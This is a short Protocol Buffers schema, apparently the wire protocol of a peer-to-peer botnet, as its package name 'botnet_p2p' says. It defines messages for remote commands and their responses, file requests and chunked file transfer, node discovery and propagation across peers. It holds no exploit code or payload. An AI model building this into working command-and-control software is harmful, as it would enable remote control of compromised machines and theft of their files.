Message.proto

syntax = "proto3";
package botnet_p2p;

message Message {
    enum MessageType {
        COMMAND = 0;
        COMMAND_RESPONSE = 1;
        FILE_REQUEST = 2;
        FILE_CHUNK = 3;
        PING = 4;
        PING_RESPONSE = 5;
        LEAVE = 6;
        FIND_NODE = 7;
        FOUND_NODES = 8;
    }

    enum Status {
        FAIL = 0;
        OK = 1;
    }

    message Contact {
        string guid = 1;
        string IP = 2;
        uint32 port = 3;
        bool isNAT = 4;
    }

    message CommandMsg {
        string command = 1;
        bool shouldRespond = 2;
    }

    message CommandResponseMsg {
        string value = 1;
        Status status = 2;
    }

    message FileRequestMsg {
        string path = 1;
    }
    
    message FileChunkMsg {
        string uuid = 1;
        string fileName = 2;
        uint32 fileSize = 3;
        uint32 ordinal = 4;
        bytes data = 5;
    }
    
    message FindNodeMsg {
        string guid = 1;
    }

    message FoundNodesMsg {
        repeated Contact nodes = 1;
    }
    
    string uuid = 1;
    MessageType type = 2;
    Contact sender = 3;
    Contact receiver = 4;
    bool propagate = 5;
    oneof payload {
        CommandMsg command = 6;
        CommandResponseMsg response = 7;
        FileRequestMsg fileRequest = 8;
        FileChunkMsg fileChunk = 9;
        FindNodeMsg findNode = 10;
        FoundNodesMsg foundNodes = 11;          
    }
}
